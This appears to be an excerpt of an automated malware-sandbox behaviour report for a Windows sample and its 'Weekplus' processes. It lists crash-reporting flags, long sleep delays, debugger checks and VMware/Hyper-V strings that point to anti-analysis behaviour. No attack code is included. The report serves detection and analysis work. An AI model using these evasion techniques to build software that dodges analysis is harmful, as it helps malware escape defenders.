Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Memory allocated: 2640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Memory allocated: 1D3D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Memory allocated: 1670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Memory allocated: 1BD10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Window / User API: threadDelayed 7633	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Window / User API: threadDelayed 2020	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Window / User API: threadDelayed 4605	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Window / User API: threadDelayed 2490	Jump to behavior
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Window / User API: threadDelayed 2398
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Window / User API: foregroundWindowGot 1774
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Window / User API: threadDelayed 2362
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Window / User API: foregroundWindowGot 1775
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Window / User API: threadDelayed 2283
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Window / User API: foregroundWindowGot 1776

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

API coverage: 9.7 %

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 5148	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7140	Thread sleep count: 7633 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 4796	Thread sleep count: 2020 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 5148	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe TID: 1264	Thread sleep count: 4605 > 30	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe TID: 612	Thread sleep count: 2490 > 30	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe TID: 5960	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe TID: 5804	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Program Files\Weekplus\APP.exe	Last function: Thread delayed
Source: C:\Program Files\Weekplus\APP.exe	Last function: Thread delayed
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Last function: Thread delayed
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Last function: Thread delayed

Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B916A480 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,	0_2_00007FF8B916A480
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDBE20C FindFirstFileExW,	8_2_00007FF89FDBE20C
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 16_2_00007FF8BFB7E20C FindFirstFileExW,	16_2_00007FF8BFB7E20C

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FF8B915A230 GetSystemInfo,

0_2_00007FF8B915A230

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_#U6c47#U8054#U65_216329f15446f2b8c3a5289c0fe9c4b73214d_6b7b5bfd_7fa7792f-7ddb-47c5-8ccd-4ba2ab9f3a72\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_c9764143e078c6f7f2798a7b2834e710aeda4b32_54de7261_ea7bb66d-8dc3-4b8e-b9a7-d202b9eabf7e\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue

Source: GamePlusPlus.exe, 00000008.00000002.2915076303.000001B5996E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll,@
Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: GamePlusPlus.exe, 00000016.00000002.3917137873.000002C151271000.00000002.10000000.00040000.00000000.sdmp	Binary or memory string: ?%s %d.%d.%d.%d.%dC:\Program Files\VMware\VMware Tools\VMwareService.exeVMwareTray.exeVMwareUser.exelocalhostWORKGROUP\\.\PhysicalDrive0invalid string positionstring too long
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GamePlusPlus.exe, 00000016.00000002.3917137873.000002C151271000.00000002.10000000.00040000.00000000.sdmp	Binary or memory string: C:\Program Files\VMware\VMware Tools\
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3966381165.000000000284B000.00000004.00000020.00020000.00000000.sdmp, GamePlusPlus.exe, 00000010.00000002.3326654982.00000115DA868000.00000004.00000020.00020000.00000000.sdmp, GamePlusPlus.exe, 00000016.00000002.3916671618.000002C14F4A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: #U6c47#U8054#U652f#U4ed8.exe, 00000000.00000002.3969584982.00000000056D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process queried: DebugPort
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process queried: DebugPort
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FF8B916FF10 IsDebuggerPresent,Concurrency::details::UMSBackgroundPoller::~UMSBackgroundPoller,

0_2_00007FF8B916FF10

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FF8B916F29F _invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_aligned_msize,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,_aligned_msize,_invoke_watson_if_error,__vcrt_lock,__vcrt_lock,GetFileType,WriteConsoleW,GetLastError,WriteFile,WriteFile,OutputDebugStringW,_invoke_watson_if_error,

0_2_00007FF8B916F29F

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

8_2_00007FF78B874790

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

Code function: 0_2_00007FF8B9169640 GetProcessHeap,

0_2_00007FF8B9169640

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B9141A60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF8B9141A60
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B9142610 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF8B9142610
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Code function: 0_2_00007FF8B9160830 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF8B9160830
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B873450 SetUnhandledExceptionFilter,	8_2_00007FF78B873450
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B88FC38 memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF78B88FC38
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF78B88FE14 SetUnhandledExceptionFilter,	8_2_00007FF78B88FE14
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDC6D18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00007FF89FDC6D18
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Code function: 8_2_00007FF89FDB1478 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00007FF89FDB1478
